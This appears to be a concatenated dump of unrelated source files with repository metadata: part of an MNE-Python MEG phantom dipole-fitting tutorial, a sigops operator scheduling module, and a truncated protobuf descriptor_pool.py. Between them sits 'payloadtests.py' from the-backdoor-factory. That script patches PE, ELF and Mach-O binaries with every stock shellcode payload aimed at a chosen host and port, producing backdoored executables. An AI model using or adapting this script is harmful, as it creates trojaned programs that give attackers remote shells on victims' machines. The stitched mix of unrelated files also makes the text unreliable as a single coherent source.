# for the phantom, where each dipole (1-32) gets its own event:
events = find_events(raw, 'STI201')
raw.plot(events=events)
raw.info['bads'] = ['MEG1933', 'MEG2421']
###############################################################################
# The data have strong line frequency (60 Hz and harmonics) and cHPI coil
# noise (five peaks around 300 Hz). Here we plot only out to 60 seconds
# to save memory:
raw.plot_psd(tmax=30., average=False)
###############################################################################
# Our phantom produces sinusoidal bursts at 20 Hz:
raw.plot(events=events)
###############################################################################
# Now we epoch our data, average it, and look at the first dipole response.
# The first peak appears around 3 ms. Because we low-passed at 40 Hz,
# we can also decimate our data to save memory.
tmin, tmax = -0.1, 0.1
bmax = -0.05 # Avoid capture filter ringing into baseline
event_id = list(range(1, 33))
epochs = mne.Epochs(raw, events, event_id, tmin, tmax, baseline=(None, bmax),
preload=False)
epochs['1'].average().plot(time_unit='s')
###############################################################################
# .. _plt_brainstorm_phantom_elekta_eeg_sphere_geometry:
#
# Let's use a :ref:`sphere head geometry model <eeg_sphere_model>`
# and let's see the coordinate alignment and the sphere location. The phantom
# is properly modeled by a single-shell sphere with origin (0., 0., 0.).
sphere = mne.make_sphere_model(r0=(0., 0., 0.), head_radius=0.08)
mne.viz.plot_alignment(epochs.info, subject=subject, show_axes=True,
bem=sphere, dig=True, surfaces='head')
###############################################################################
# Let's do some dipole fits. We first compute the noise covariance,
# then do the fits for each event_id taking the time instant that maximizes
# the global field power.
# here we can get away with using method='oas' for speed (faster than "shrunk")
# but in general "shrunk" is usually better
cov = mne.compute_covariance(epochs, tmax=bmax)
mne.viz.plot_evoked_white(epochs['1'].average(), cov)
data = []
t_peak = 0.036 # true for Elekta phantom
for ii in event_id:
# Avoid the first and last trials -- can contain dipole-switching artifacts
evoked = epochs[str(ii)][1:-1].average().crop(t_peak, t_peak)
data.append(evoked.data[:, 0])
evoked = mne.EvokedArray(np.array(data).T, evoked.info, tmin=0.)
del epochs
dip, residual = fit_dipole(evoked, cov, sphere, n_jobs=1)
###############################################################################
# Do a quick visualization of how much variance we explained, putting the
# data and residuals on the same scale (here the "time points" are the
# 32 dipole peak values that we fit):
fig, axes = plt.subplots(2, 1)
evoked.plot(axes=axes)
for ax in axes:
ax.texts = []
for line in ax.lines:
line.set_color('#98df81')
residual.plot(axes=axes)
###############################################################################
# Now we can compare to the actual locations, taking the difference in mm:
actual_pos, actual_ori = mne.dipole.get_phantom_dipoles()
actual_amp = 100. # nAm
fig, (ax1, ax2, ax3) = plt.subplots(nrows=3, ncols=1, figsize=(6, 7))
diffs = 1000 * np.sqrt(np.sum((dip.pos - actual_pos) ** 2, axis=-1))
print('mean(position error) = %0.1f mm' % (np.mean(diffs),))
ax1.bar(event_id, diffs)
ax1.set_xlabel('Dipole index')
ax1.set_ylabel('Loc. error (mm)')
angles = np.rad2deg(np.arccos(np.abs(np.sum(dip.ori * actual_ori, axis=1))))
print(u'mean(angle error) = %0.1f°' % (np.mean(angles),))
ax2.bar(event_id, angles)
ax2.set_xlabel('Dipole index')
ax2.set_ylabel(u'Angle error (°)')
amps = actual_amp - dip.amplitude / 1e-9
print('mean(abs amplitude error) = %0.1f nAm' % (np.mean(np.abs(amps)),))
ax3.bar(event_id, amps)
ax3.set_xlabel('Dipole index')
ax3.set_ylabel('Amplitude error (nAm)')
fig.tight_layout()
plt.show()
###############################################################################
# Let's plot the positions and the orientations of the actual and the estimated
# dipoles
actual_amp = np.ones(len(dip)) # misc amp to create Dipole instance
actual_gof = np.ones(len(dip)) # misc GOF to create Dipole instance
dip_true = \
mne.Dipole(dip.times, actual_pos, actual_amp, actual_ori, actual_gof)
fig = mne.viz.plot_alignment(evoked.info, bem=sphere, surfaces='inner_skull',
coord_frame='head', meg='helmet', show_axes=True)
# Plot the position and the orientation of the actual dipole
fig = mne.viz.plot_dipole_locations(dipoles=dip_true, mode='arrow',
subject=subject, color=(0., 0., 0.),
fig=fig)
# Plot the position and the orientation of the estimated dipole
fig = mne.viz.plot_dipole_locations(dipoles=dip, mode='arrow', subject=subject,
color=(0.2, 1., 0.5), fig=fig)
mne.viz.set_3d_view(figure=fig, azimuth=70, elevation=80, distance=0.5)
| bsd-3-clause | 1,073,916,227,645,137,800 | 37.290698 | 79 | 0.601731 | false |
uvbs/the-backdoor-factory | payloadtests.py | 13 | 6022 | #!/usr/bin/env python
'''
Copyright (c) 2013-2015, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
import pebin
import machobin
import elfbin
import sys
import os
def basicDiscovery(FILE):
macho_supported = ['\xcf\xfa\xed\xfe', '\xca\xfe\xba\xbe',
'\xce\xfa\xed\xfe',
]
testBinary = open(FILE, 'rb')
header = testBinary.read(4)
testBinary.close()
if 'MZ' in header:
return 'PE'
elif 'ELF' in header:
return 'ELF'
elif header in macho_supported:
return "MACHO"
else:
'Only support ELF, PE, and MACH-O file formats'
return None
if __name__ == "__main__":
'''
Will create patched binaries for each payload for the type of binary provided.
Each payload has it's own port number.
Usage: ./payloadtests.py file 127.0.0.1 8080
'''
if len(sys.argv) != 4:
print "Will create patched binaries for each stock shellcode/payload for the "
print "type of binary provided. Each payload type has it's own port number."
print "Usage:" + str(sys.argv[0]) + " binary HOST PORT"
sys.exit()
file = sys.argv[1]
host = sys.argv[2]
port = int(sys.argv[3])
outputfiles = {}
is_supported = basicDiscovery(file)
if is_supported is "PE":
patchtypes = ['APPEND', 'JUMP', 'SINGLE']
supported_file = pebin.pebin(FILE=file, OUTPUT=None, SHELL='none')
supported_file.run_this()
#print supported_file.flItms['avail_shells']
for aShell in supported_file.flItms['avail_shells']:
for patchtype in patchtypes:
if 'cave_miner' in aShell or 'user_supplied' in aShell:
continue
aName = aShell + "." + patchtype + "." + str(host) + "." + str(port) + "." + file
print "Creating File:", aName
if patchtype == 'APPEND':
supported_file = pebin.pebin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port, ADD_SECTION=True)
elif patchtype == 'JUMP':
supported_file = pebin.pebin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port, CAVE_JUMPING=True)
elif patchtype == 'SINGLE':
supported_file = pebin.pebin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port, CAVE_JUMPING=False)
result = supported_file.run_this()
outputfiles[aName] = result
port += 1
elif is_supported is "ELF":
supported_file = elfbin.elfbin(FILE=file, OUTPUT=None, SHELL='none')
supported_file.run_this()
for aShell in supported_file.avail_shells:
if 'cave_miner' in aShell or 'user_supplied' in aShell:
continue
aName = aShell + "." + str(host) + "." + str(port) + "." + file
print "Creating File:", aName
supported_file = elfbin.elfbin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port)
result = supported_file.run_this()
outputfiles[aName] = result
port += 1
elif is_supported is "MACHO":
supported_file = machobin.machobin(FILE=file, OUTPUT=None, SHELL='none')
supported_file.run_this()
for aShell in supported_file.avail_shells:
if 'cave_miner' in aShell or 'user_supplied' in aShell:
continue
aName = aShell + "." + str(host) + "." + str(port) + "." + file
print "Creating File:", aName
supported_file = machobin.machobin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port, FAT_PRIORITY='ALL')
result = supported_file.run_this()
outputfiles[aName] = result
port += 1
print "Successful files are in backdoored:"
for afile, aresult in outputfiles.iteritems():
if aresult is True:
print afile, 'Success'
else:
print afile, 'Fail'
os.remove('backdoored/' + afile)
| bsd-3-clause | -685,154,654,474,719,700 | 39.689189 | 97 | 0.57921 | false |
jaberg/sigops | sigops/operator.py | 1 | 6049 | import numpy as np
import itertools
from collections import defaultdict
import numpy as np
import networkx as nx
def is_op(thing):
try:
return thing._is_sigops_operator
except AttributeError:
return False
class Operator(object):
"""Base class for operator instances understood by nengo.Simulator.
The lifetime of a Signal during one simulator timestep:
0) at most one set operator (optional)
1) any number of increments
2) any number of reads
3) at most one update
A signal that is only read can be considered a "constant".
A signal that is both set *and* updated can be a problem:
since reads must come after the set, and the set will destroy
whatever were the contents of the update, it can be the case
that the update is completely hidden and rendered irrelevant.
There are however at least two reasons to use both a set and an update:
(a) to use a signal as scratch space (updating means destroying it)
(b) to use sets and updates on partly overlapping views of the same
memory.
N.B.: It is done on purpose that there are no default values for
reads, sets, incs, and updates.
Each operator should explicitly set each of these properties.
"""
_is_sigops_operator = True
@property
def reads(self):
"""Signals that are read and not modified"""
return self._reads
@reads.setter
def reads(self, val):
self._reads = val
@property
def sets(self):
"""Signals assigned by this operator
A signal that is set here cannot be set or updated
by any other operator.
"""
return self._sets
@sets.setter
def sets(self, val):
self._sets = val
@property
def incs(self):
"""Signals incremented by this operator
Increments will be applied after this signal has been
set (if it is set), and before reads.
"""
return self._incs
@incs.setter
def incs(self, val):
self._incs = val
@property
def updates(self):
"""Signals assigned their value for time t + 1
This operator will be scheduled so that updates appear after
all sets, increments and reads of this signal.
"""
return self._updates
@updates.setter
def updates(self, val):
self._updates = val
@property
def all_signals(self):
return self.reads + self.sets + self.incs + self.updates
def init_signals(self, signals):
"""
Install any buffers into the signals view that
this operator will need. Classes for nonlinearities
that use extra buffers should create them here.
"""
for sig in self.all_signals:
if sig.base not in signals:
signals[sig.base] = np.asarray(
np.zeros(sig.base.shape, dtype=sig.base.dtype)
+ sig.base.value)
def depgraph(operators, verbose=False):
dg = nx.DiGraph()
for op in operators:
dg.add_edges_from(itertools.product(op.reads + op.updates, [op]))
dg.add_edges_from(itertools.product([op], op.sets + op.incs))
# -- all views of a base object in a particular dictionary
by_base_writes = defaultdict(list)
by_base_reads = defaultdict(list)
reads = defaultdict(list)
sets = defaultdict(list)
incs = defaultdict(list)
ups = defaultdict(list)
for op in operators:
for node in op.sets + op.incs:
by_base_writes[node.base].append(node)
for node in op.reads:
by_base_reads[node.base].append(node)
for node in op.reads:
reads[node].append(op)
for node in op.sets:
sets[node].append(op)
for node in op.incs:
incs[node].append(op)
for node in op.updates:
ups[node].append(op)
# -- assert that only one op sets any particular view
for node in sets:
assert len(sets[node]) == 1, (node, sets[node])
# -- assert that only one op updates any particular view
for node in ups:
assert len(ups[node]) == 1, (node, ups[node])
# --- assert that any node that is incremented is also set/updated
for node in incs:
assert len(sets[node] + ups[node]) > 0, (node)
# -- assert that no two views are both set and aliased
if len(sets) >= 2:
for node, other in itertools.combinations(sets, 2):
assert not node.shares_memory_with(other), \
("%s shares memory with %s" % (node, other))
# -- assert that no two views are both updated and aliased
if len(ups) >= 2:
for node, other in itertools.combinations(ups, 2):
assert not node.shares_memory_with(other), (node, other)
# -- Scheduling algorithm for serial evaluation:
# 1) All sets on a given base signal
# 2) All incs on a given base signal
# 3) All reads on a given base signal
# 4) All updates on a given base signal
# -- incs depend on sets
for node, post_ops in incs.items():
pre_ops = list(sets[node])
for other in by_base_writes[node.base]:
pre_ops += sets[other]
dg.add_edges_from(itertools.product(set(pre_ops), post_ops))
# -- reads depend on writes (sets and incs)
for node, post_ops in reads.items():
pre_ops = sets[node] + incs[node]
for other in by_base_writes[node.base]:
pre_ops += sets[other] + incs[other]
dg.add_edges_from(itertools.product(set(pre_ops), post_ops))
# -- updates depend on reads, sets, and incs.
for node, post_ops in ups.items():
pre_ops = sets[node] + incs[node] + reads[node]
for other in by_base_writes[node.base]:
pre_ops += sets[other] + incs[other] + reads[other]
for other in by_base_reads[node.base]:
pre_ops += sets[other] + incs[other] + reads[other]
dg.add_edges_from(itertools.product(set(pre_ops), post_ops))
return dg
| bsd-2-clause | -5,643,363,047,490,116,000 | 29.862245 | 75 | 0.617127 | false |
javier-ruiz-b/docker-rasppi-images | raspberry-google-home/env/lib/python3.7/site-packages/google/protobuf/descriptor_pool.py | 20 | 46541 | # Protocol Buffers - Google's data interchange format
# Copyright 2008 Google Inc. All rights reserved.
# https://developers.google.com/protocol-buffers/
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Provides DescriptorPool to use as a container for proto2 descriptors.
The DescriptorPool is used in conjection with a DescriptorDatabase to maintain
a collection of protocol buffer descriptors for use when dynamically creating
message types at runtime.
For most applications protocol buffers should be used via modules generated by
the protocol buffer compiler tool. This should only be used when the type of
protocol buffers used in an application or library cannot be predetermined.
Below is a straightforward example on how to use this class::
pool = DescriptorPool()
file_descriptor_protos = [ ... ]
for file_descriptor_proto in file_descriptor_protos:
pool.Add(file_descriptor_proto)
my_message_descriptor = pool.FindMessageTypeByName('some.package.MessageType')
The message descriptor can be used in conjunction with the message_factory
module in order to create a protocol buffer class that can be encoded and
decoded.
If you want to get a Python class for the specified proto, use the
helper functions inside google.protobuf.message_factory
directly instead of this class.
"""
__author__ = '[email protected] (Matt Toia)'
import collections
import warnings
from google.protobuf import descriptor
from google.protobuf import descriptor_database
from google.protobuf import text_encoding
_USE_C_DESCRIPTORS = descriptor._USE_C_DESCRIPTORS # pylint: disable=protected-access
def _Deprecated(func):
"""Mark functions as deprecated."""
def NewFunc(*args, **kwargs):
warnings.warn(
'Call to deprecated function %s(). Note: Do add unlinked descriptors '
'to descriptor_pool is wrong. Use Add() or AddSerializedFile() '
'instead.' % func.__name__,
category=DeprecationWarning)
return func(*args, **kwargs)
NewFunc.__name__ = func.__name__
NewFunc.__doc__ = func.__doc__
NewFunc.__dict__.update(func.__dict__)
return NewFunc
def _NormalizeFullyQualifiedName(name):
"""Remove leading period from fully-qualified type name.
Due to b/13860351 in descriptor_database.py, types in the root namespace are
generated with a leading period. This function removes that prefix.
Args:
name (str): The fully-qualified symbol name.
Returns:
str: The normalized fully-qualified symbol name.
"""
return name.lstrip('.')
def _OptionsOrNone(descriptor_proto):
"""Returns the value of the field `options`, or None if it is not set."""
if descriptor_proto.HasField('options'):
return descriptor_proto.options
else:
return None
def _IsMessageSetExtension(field):
return (field.is_extension and
field.containing_type.has_options and
field.containing_type.GetOptions().message_set_wire_format and
field.type == descriptor.FieldDescriptor.TYPE_MESSAGE and
field.label == descriptor.FieldDescriptor.LABEL_OPTIONAL)
class DescriptorPool(object):
"""A collection of protobufs dynamically constructed by descriptor protos."""
if _USE_C_DESCRIPTORS:
def __new__(cls, descriptor_db=None):
# pylint: disable=protected-access
return descriptor._message.DescriptorPool(descriptor_db)
def __init__(self, descriptor_db=None):
"""Initializes a Pool of proto buffs.
The descriptor_db argument to the constructor is provided to allow
specialized file descriptor proto lookup code to be triggered on demand. An
example would be an implementation which will read and compile a file
specified in a call to FindFileByName() and not require the call to Add()
at all. Results from this database will be cached internally here as well.
Args:
descriptor_db: A secondary source of file descriptors.
"""
self._internal_db = descriptor_database.DescriptorDatabase()
self._descriptor_db = descriptor_db
self._descriptors = {}
self._enum_descriptors = {}
self._service_descriptors = {}
self._file_descriptors = {}
self._toplevel_extensions = {}
# TODO(jieluo): Remove _file_desc_by_toplevel_extension after
# maybe year 2020 for compatibility issue (with 3.4.1 only).
self._file_desc_by_toplevel_extension = {}
self._top_enum_values = {}
# We store extensions in two two-level mappings: The first key is the
# descriptor of the message being extended, the second key is the extension
# full name or its tag number.
self._extensions_by_name = collections.defaultdict(dict)
self._extensions_by_number = collections.defaultdict(dict)
def _CheckConflictRegister(self, desc, desc_name, file_name):
"""Check if the descriptor name conflicts with another of the same name.
Args:
desc: Descriptor of a message, enum, service, extension or enum value.
desc_name (str): the full name of desc.
file_name (str): The file name of descriptor.
"""
for register, descriptor_type in [
(self._descriptors, descriptor.Descriptor),
(self._enum_descriptors, descriptor.EnumDescriptor),
(self._service_descriptors, descriptor.ServiceDescriptor),
(self._toplevel_extensions, descriptor.FieldDescriptor),
(self._top_enum_values, descriptor.EnumValueDescriptor)]:
if desc_name in register:
old_desc = register[desc_name]
if isinstance(old_desc, descriptor.EnumValueDescriptor):
old_file = old_desc.type.file.name
else:
old_file = old_desc.file.name
if not isinstance(desc, descriptor_type) or (
old_file != file_name):
error_msg = ('Conflict register for file "' + file_name +
'": ' + desc_name +
' is already defined in file "' +
old_file + '". Please fix the conflict by adding '
'package name on the proto file, or use different '
'name for the duplication.')
if isinstance(desc, descriptor.EnumValueDescriptor):
error_msg += ('\nNote: enum values appear as '
'siblings of the enum type instead of '
'children of it.')
raise TypeError(error_msg)
return
def Add(self, file_desc_proto):
"""Adds the FileDescriptorProto and its types to this pool.
Args:
file_desc_proto (FileDescriptorProto): The file descriptor to add.
"""
self._internal_db.Add(file_desc_proto)
def AddSerializedFile(self, serialized_file_desc_proto):
"""Adds the FileDescriptorProto and its types to this pool.
Args:
serialized_file_desc_proto (bytes): A bytes string, serialization of the
:class:`FileDescriptorProto` to add.
"""
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pb2
file_desc_proto = descriptor_pb2.FileDescriptorProto.FromString(
serialized_file_desc_proto)
self.Add(file_desc_proto)
# Add Descriptor to descriptor pool is dreprecated. Please use Add()
# or AddSerializedFile() to add a FileDescriptorProto instead.
@_Deprecated
def AddDescriptor(self, desc):
self._AddDescriptor(desc)
# Never call this method. It is for internal usage only.
def _AddDescriptor(self, desc):
"""Adds a Descriptor to the pool, non-recursively.
If the Descriptor contains nested messages or enums, the caller must
explicitly register them. This method also registers the FileDescriptor
associated with the message.
Args:
desc: A Descriptor.
"""
if not isinstance(desc, descriptor.Descriptor):
raise TypeError('Expected instance of descriptor.Descriptor.')
self._CheckConflictRegister(desc, desc.full_name, desc.file.name)
self._descriptors[desc.full_name] = desc
self._AddFileDescriptor(desc.file)
# Add EnumDescriptor to descriptor pool is dreprecated. Please use Add()
# or AddSerializedFile() to add a FileDescriptorProto instead.
@_Deprecated
def AddEnumDescriptor(self, enum_desc):
self._AddEnumDescriptor(enum_desc)
# Never call this method. It is for internal usage only.
def _AddEnumDescriptor(self, enum_desc):
"""Adds an EnumDescriptor to the pool.
This method also registers the FileDescriptor associated with the enum.
Args:
enum_desc: An EnumDescriptor.
"""
if not isinstance(enum_desc, descriptor.EnumDescriptor):
raise TypeError('Expected instance of descriptor.EnumDescriptor.')
file_name = enum_desc.file.name
self._CheckConflictRegister(enum_desc, enum_desc.full_name, file_name)
self._enum_descriptors[enum_desc.full_name] = enum_desc
# Top enum values need to be indexed.
# Count the number of dots to see whether the enum is toplevel or nested
# in a message. We cannot use enum_desc.containing_type at this stage.
if enum_desc.file.package:
top_level = (enum_desc.full_name.count('.')
- enum_desc.file.package.count('.') == 1)
else:
top_level = enum_desc.full_name.count('.') == 0
if top_level:
file_name = enum_desc.file.name
package = enum_desc.file.package
for enum_value in enum_desc.values:
full_name = _NormalizeFullyQualifiedName(
'.'.join((package, enum_value.name)))
self._CheckConflictRegister(enum_value, full_name, file_name)
self._top_enum_values[full_name] = enum_value
self._AddFileDescriptor(enum_desc.file)
# Add ServiceDescriptor to descriptor pool is dreprecated. Please use Add()
# or AddSerializedFile() to add a FileDescriptorProto instead.
@_Deprecated
def AddServiceDescriptor(self, service_desc):
self._AddServiceDescriptor(service_desc)
# Never call this method. It is for internal usage only.
def _AddServiceDescriptor(self, service_desc):
"""Adds a ServiceDescriptor to the pool.
Args:
service_desc: A ServiceDescriptor.
"""
if not isinstance(service_desc, descriptor.ServiceDescriptor):
raise TypeError('Expected instance of descriptor.ServiceDescriptor.')
self._CheckConflictRegister(service_desc, service_desc.full_name,
service_desc.file.name)
self._service_descriptors[service_desc.full_name] = service_desc
# Add ExtensionDescriptor to descriptor pool is dreprecated. Please use Add()
# or AddSerializedFile() to add a FileDescriptorProto instead.
@_Deprecated
def AddExtensionDescriptor(self, extension):
self._AddExtensionDescriptor(extension)
# Never call this method. It is for internal usage only.
def _AddExtensionDescriptor(self, extension):
"""Adds a FieldDescriptor describing an extension to the pool.
Args:
extension: A FieldDescriptor.
Raises:
AssertionError: when another extension with the same number extends the
same message.
TypeError: when the specified extension is not a
descriptor.FieldDescriptor.
"""
if not (isinstance(extension, descriptor.FieldDescriptor) and
extension.is_extension):
raise TypeError('Expected an extension descriptor.')
if extension.extension_scope is None:
self._toplevel_extensions[extension.full_name] = extension
try:
existing_desc = self._extensions_by_number[
extension.containing_type][extension.number]
except KeyError:
pass
else:
if extension is not existing_desc:
raise AssertionError(
'Extensions "%s" and "%s" both try to extend message type "%s" '
'with field number %d.' %
(extension.full_name, existing_desc.full_name,
extension.containing_type.full_name, extension.number))
self._extensions_by_number[extension.containing_type][
extension.number] = extension
self._extensions_by_name[extension.containing_type][
extension.full_name] = extension
# Also register MessageSet extensions with the type name.
if _IsMessageSetExtension(extension):
self._extensions_by_name[extension.containing_type][
extension.message_type.full_name] = extension
@_Deprecated
def AddFileDescriptor(self, file_desc):
self._InternalAddFileDescriptor(file_desc)
# Never call this method. It is for internal usage only.
def _InternalAddFileDescriptor(self, file_desc):
"""Adds a FileDescriptor to the pool, non-recursively.
If the FileDescriptor contains messages or enums, the caller must explicitly
register them.
Args:
file_desc: A FileDescriptor.
"""
self._AddFileDescriptor(file_desc)
# TODO(jieluo): This is a temporary solution for FieldDescriptor.file.
# FieldDescriptor.file is added in code gen. Remove this solution after
# maybe 2020 for compatibility reason (with 3.4.1 only).
for extension in file_desc.extensions_by_name.values():
self._file_desc_by_toplevel_extension[
extension.full_name] = file_desc
def _AddFileDescriptor(self, file_desc):
"""Adds a FileDescriptor to the pool, non-recursively.
If the FileDescriptor contains messages or enums, the caller must explicitly
register them.
Args:
file_desc: A FileDescriptor.
"""
if not isinstance(file_desc, descriptor.FileDescriptor):
raise TypeError('Expected instance of descriptor.FileDescriptor.')
self._file_descriptors[file_desc.name] = file_desc
def FindFileByName(self, file_name):
"""Gets a FileDescriptor by file name.
Args:
file_name (str): The path to the file to get a descriptor for.
Returns:
FileDescriptor: The descriptor for the named file.
Raises:
KeyError: if the file cannot be found in the pool.
"""
try:
return self._file_descriptors[file_name]
except KeyError:
pass
try:
file_proto = self._internal_db.FindFileByName(file_name)
except KeyError as error:
if self._descriptor_db:
file_proto = self._descriptor_db.FindFileByName(file_name)
else:
raise error
if not file_proto:
raise KeyError('Cannot find a file named %s' % file_name)
return self._ConvertFileProtoToFileDescriptor(file_proto)
def FindFileContainingSymbol(self, symbol):
"""Gets the FileDescriptor for the file containing the specified symbol.
Args:
symbol (str): The name of the symbol to search for.
Returns:
FileDescriptor: Descriptor for the file that contains the specified
symbol.
Raises:
KeyError: if the file cannot be found in the pool.
"""
symbol = _NormalizeFullyQualifiedName(symbol)
try:
return self._InternalFindFileContainingSymbol(symbol)
except KeyError:
pass
try:
# Try fallback database. Build and find again if possible.
self._FindFileContainingSymbolInDb(symbol)
return self._InternalFindFileContainingSymbol(symbol)
except KeyError:
raise KeyError('Cannot find a file containing %s' % symbol)
def _InternalFindFileContainingSymbol(self, symbol):
"""Gets the already built FileDescriptor containing the specified symbol.
Args:
symbol (str): The name of the symbol to search for.
Returns:
FileDescriptor: Descriptor for the file that contains the specified
symbol.
Raises:
KeyError: if the file cannot be found in the pool.
"""
try:
return self._descriptors[symbol].file
except KeyError:
pass
try:
return self._enum_descriptors[symbol].file
except KeyError:
pass
try:
return self._service_descriptors[symbol].file
except KeyError:
pass
try:
return self._top_enum_values[symbol].type.file
except KeyError:
pass
try:
return self._file_desc_by_toplevel_extension[symbol]
except KeyError:
pass
# Try fields, enum values and nested extensions inside a message.
top_name, _, sub_name = symbol.rpartition('.')
try:
message = self.FindMessageTypeByName(top_name)
assert (sub_name in message.extensions_by_name or
sub_name in message.fields_by_name or
sub_name in message.enum_values_by_name)
return message.file
except (KeyError, AssertionError):
raise KeyError('Cannot find a file containing %s' % symbol)
def FindMessageTypeByName(self, full_name):
"""Loads the named descriptor from the pool.
Args:
full_name (str): The full name of the descriptor to load.
Returns:
Descriptor: The descriptor for the named type.
Raises:
KeyError: if the message cannot be found in the pool.
"""
full_name = _NormalizeFullyQualifiedName(full_name)
if full_name not in self._descriptors:
self._FindFileContainingSymbolInDb(full_name)
return self._descriptors[full_name]
def FindEnumTypeByName(self, full_name):
"""Loads the named enum descriptor from the pool.
Args:
full_name (str): The full name of the enum descriptor to load.
Returns:
EnumDescriptor: The enum descriptor for the named type.
Raises:
KeyError: if the enum cannot be found in the pool.
"""
full_name = _NormalizeFullyQualifiedName(full_name)
if full_name not in self._enum_descriptors:
self._FindFileContainingSymbolInDb(full_name)
return self._enum_descriptors[full_name]
def FindFieldByName(self, full_name):
"""Loads the named field descriptor from the pool.
Args:
full_name (str): The full name of the field descriptor to load.
Returns:
FieldDescriptor: The field descriptor for the named field.
Raises:
KeyError: if the field cannot be found in the pool.
"""
full_name = _NormalizeFullyQualifiedName(full_name)
message_name, _, field_name = full_name.rpartition('.')
message_descriptor = self.FindMessageTypeByName(message_name)
return message_descriptor.fields_by_name[field_name]
def FindOneofByName(self, full_name):
"""Loads the named oneof descriptor from the pool.
Args:
full_name (str): The full name of the oneof descriptor to load.
Returns:
OneofDescriptor: The oneof descriptor for the named oneof.
Raises:
KeyError: if the oneof cannot be found in the pool.
"""
full_name = _NormalizeFullyQualifiedName(full_name)
message_name, _, oneof_name = full_name.rpartition('.')
message_descriptor = self.FindMessageTypeByName(message_name)
return message_descriptor.oneofs_by_name[oneof_name]
def FindExtensionByName(self, full_name):
"""Loads the named extension descriptor from the pool.
Args:
full_name (str): The full name of the extension descriptor to load.
Returns:
FieldDescriptor: The field descriptor for the named extension.
Raises:
KeyError: if the extension cannot be found in the pool.
"""
full_name = _NormalizeFullyQualifiedName(full_name)
try:
# The proto compiler does not give any link between the FileDescriptor
# and top-level extensions unless the FileDescriptorProto is added to
# the DescriptorDatabase, but this can impact memory usage.
# So we registered these extensions by name explicitly.
return self._toplevel_extensions[full_name]
except KeyError:
pass
message_name, _, extension_name = full_name.rpartition('.')
try:
# Most extensions are nested inside a message.
scope = self.FindMessageTypeByName(message_name)
except KeyError:
# Some extensions are defined at file scope.
scope = self._FindFileContainingSymbolInDb(full_name)
return scope.extensions_by_name[extension_name]
def FindExtensionByNumber(self, message_descriptor, number):
"""Gets the extension of the specified message with the specified number.
Extensions have to be registered to this pool by calling :func:`Add` or
:func:`AddExtensionDescriptor`.
Args:
message_descriptor (Descriptor): descriptor of the extended message.
number (int): Number of the extension field.
Returns:
FieldDescriptor: The descriptor for the extension.
Raises:
KeyError: when no extension with the given number is known for the
specified message.
"""
try:
return self._extensions_by_number[message_descriptor][number]
except KeyError:
self._TryLoadExtensionFromDB(message_descriptor, number)
return self._extensions_by_number[message_descriptor][number]
def FindAllExtensions(self, message_descriptor):
"""Gets all the known extensions of a given message.
Extensions have to be registered to this pool by build related
:func:`Add` or :func:`AddExtensionDescriptor`.
Args:
message_descriptor (Descriptor): Descriptor of the extended message.
Returns:
list[FieldDescriptor]: Field descriptors describing the extensions.
"""
# Fallback to descriptor db if FindAllExtensionNumbers is provided.
if self._descriptor_db and hasattr(
self._descriptor_db, 'FindAllExtensionNumbers'):
full_name = message_descriptor.full_name
all_numbers = self._descriptor_db.FindAllExtensionNumbers(full_name)
for number in all_numbers:
if number in self._extensions_by_number[message_descriptor]:
continue
self._TryLoadExtensionFromDB(message_descriptor, number)
return list(self._extensions_by_number[message_descriptor].values())
